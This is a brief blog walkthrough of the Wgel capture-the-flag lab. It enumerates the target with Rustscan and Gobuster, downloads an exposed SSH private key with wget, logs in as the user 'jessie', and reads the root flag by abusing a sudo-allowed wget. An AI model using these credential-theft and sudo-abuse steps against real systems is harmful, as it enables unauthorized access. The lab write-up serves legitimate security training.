CTF Wgel CTF

CTF privesc
Created At :
Count:138 Views 👀 :
  1. Rustscan
  2. Browse the website
  3. Gobuster
  4. Download id_rsa
  5. SSH
  6. First flag
  7. root flag

Rustscan

rustscan -a 10.10.227.219

Browse the website

This is the default page.

We have a user, Jessie

Gobuster

gobuster dir -u http://10.10.227.219/. -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Let’s run an anoter scan in sitemap.
I’ve tries with the same wordlist but nothing came out.
So I’m using an another one.

gobuster dir -u http://10.10.227.219/sitemap -x txt,html,php -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

Download id_rsa

wget http://10.10.227.219/sitemap/.ssh/id_rsa

SSH

chmod 600 id_rsa
ssh -i id_rsa jessie@10.10.227.219

First flag

There is no tabulation.

root flag

sudo /usr/bin/wget -i /root/root_flag.txt

https://gtfobins.github.io/gtfobins/wget/10.10.14.154

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme